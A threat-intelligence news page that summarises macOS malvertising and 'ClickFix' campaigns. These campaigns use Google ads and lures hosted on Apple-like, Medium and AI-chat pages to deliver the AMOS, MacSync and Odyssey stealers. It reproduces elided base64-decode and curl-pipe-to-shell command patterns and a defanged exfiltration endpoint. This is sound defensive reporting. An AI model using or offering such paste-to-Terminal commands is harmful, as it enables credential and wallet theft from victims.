Malicious Google Search Ads and Forged Apple Pages Trick macOS Users Into Running Terminal Commands
Security researchers reported an active macOS social-engineering campaign that abuses Google Search sponsored results and Google-hosted content (notably docs.google.com, and also business.google.com) to funnel users to forged Apple Support-like pages and other lookalike content (including Medium posts). The pages instruct victims—often searching for “mac cleaner” tools or macOS maintenance tasks like clearing cache—to copy/paste an obfuscated Base64 command into Terminal, which then downloads and executes a follow-on script with the user’s permissions.
Once executed, the payload can enable remote access and data theft, including harvesting sensitive files and SSH keys, and may also deploy additional malware or cryptomining. One report ties the activity to delivery of the AMOS (aka SOMA) stealer, which was observed creating artifacts such as .agent (AppleScript used to run theft), .mainHelper (Mach-O binary), and .pass (password stored in plaintext), and attempting to access user data including Documents and Notes. Researchers also noted the apparent use of compromised, Google-verified advertiser accounts to place the malicious ads, helping the campaign bypass ad-platform trust checks.
Related Entities
Malware
Sources
Related Stories
ClickFix Campaign Abuses Claude Artifacts and Google Ads to Deliver macOS Infostealers
Threat actors are running a **ClickFix**-style social-engineering campaign that abuses **Google sponsored search results** to funnel macOS users to malicious content hosted on legitimate platforms, including **Anthropic Claude public artifacts** (`claude.ai`) and **Medium** pages impersonating trusted sources (e.g., Apple Support). The lures target common search queries such as “online DNS resolver,” “macOS CLI disk space analyzer,” and “HomeBrew,” then instruct victims to paste and run Terminal commands that decode/execute payloads (e.g., `echo "..." | base64 -D | zsh` or `curl ... | zsh`). Researchers (Moonlock Lab/MacPaw and AdGuard) reported that the malicious Claude artifact accumulated **~12,300 to 15,600 views**, indicating significant exposure (reported as **10,000+** and **15,000+** potential victims across coverage). The payloads deliver macOS information-stealing malware, including **MacSync**, which collects data such as **Keychain credentials, browser data, and cryptocurrency wallet files**. Reported tradecraft includes downloading and executing a shell script, using an AppleScript component for theft, staging stolen data into `/tmp/osalogging.zip`, and exfiltrating via HTTP POST to attacker infrastructure (e.g., `a2abotnet[.]com/gate`, with C2 paths like `a2abotnet[.]com/dynamic`). The malware attempts to blend in by spoofing legitimate macOS browser User-Agent strings and includes retry logic for large/chunked uploads, then removes staging artifacts to reduce forensic traces.
4 weeks agoMalvertising Campaign Delivers AMOS and Odyssey Stealer via Fake macOS Tool Sites
A sophisticated cybercriminal campaign has been identified targeting macOS users, particularly developers, by leveraging fake download portals that impersonate trusted platforms such as Homebrew, LogMeIn, and TradingView. The attackers have registered over 85 domains that closely mimic the legitimate sites of these popular tools, using convincing branding and user interfaces to deceive visitors. These malicious domains are promoted through Google Ads, ensuring that they appear prominently in search results and increasing the likelihood that unsuspecting users will visit them. Once on the fake sites, users are instructed to copy and execute a curl command in their Terminal, which initiates the download and installation of infostealing malware. The primary payloads delivered in this campaign are AMOS (Atomic macOS Stealer) and Odyssey Stealer, both of which are capable of harvesting sensitive information such as system details, browser data, and cryptocurrency credentials from infected machines. The campaign employs advanced social engineering tactics, including clipboard manipulation and command obfuscation, to increase the success rate of infections. Researchers from Hunt.io have mapped the infrastructure supporting this operation, noting that the attackers reuse IP addresses and SSL certificates across multiple domains, indicating a persistent and well-organized effort. The infrastructure has been active for several years, with some IP addresses registered under personal names, suggesting a degree of operational continuity and experience. The campaign does not rely on exploiting software vulnerabilities but instead exploits user trust in widely used open-source and financial tools. The use of Google Ads as a distribution vector highlights the attackers' willingness to invest in paid advertising to reach their targets. The campaign's focus on the developer community is particularly concerning, as compromised developer systems could lead to broader supply chain risks. Security researchers have emphasized the importance of verifying download sources and being wary of unsolicited installation instructions, especially those involving Terminal commands. The ongoing nature of the campaign, with continuous adaptation of infrastructure and tactics, underscores the need for vigilance among macOS users. The discovery of this campaign began with public reports from independent researchers, which were then corroborated and expanded upon by threat intelligence teams. The scale and persistence of the operation suggest that it is likely to continue evolving, posing a significant threat to the macOS ecosystem. Organizations are advised to educate users about the risks of malvertising and to implement technical controls to block access to known malicious domains. The campaign demonstrates the increasing sophistication of social engineering attacks targeting macOS, a platform often perceived as less vulnerable than Windows.
4 months ago
macOS Infostealer Campaigns Using Social Engineering and Evasion Tactics
Threat actors are escalating **macOS infostealer** activity through multiple distribution and evasion techniques aimed at harvesting sensitive user data. One campaign abuses trust in legitimate AI platforms by promoting shareable *ChatGPT* and *Grok* conversation links via **Google Ads**, luring users searching for common macOS troubleshooting help into running malicious Terminal commands using the **“ClickFix”** social-engineering pattern. Executing the provided shell commands results in installation of **Atomic macOS Stealer (AMOS)**, which steals browser credentials, crypto wallet seed phrases, **Keychain** data, and personal files before exfiltrating them to attacker-controlled infrastructure. Separately, **Odyssey Stealer** intrusions against macOS have surged globally, with notable targeting reported in the U.S., France, and Spain and additional impact across Europe, the Americas, and parts of Asia and Africa. Moonlock Lab reporting indicates Odyssey is delivered through **fake software updates, cracked tools, and fraudulent apps**, and is designed to evade detection by generating a **unique fingerprint per infection**, frequently changing code structure, and using many distinct **SHA-256** variants—suggesting automated builders are being used to produce large numbers of hard-to-block samples. Collectively, the reporting highlights sustained pressure on macOS users from credential-stealing malware that blends high-trust lures with rapid variant generation to hinder traditional defenses.
1 months ago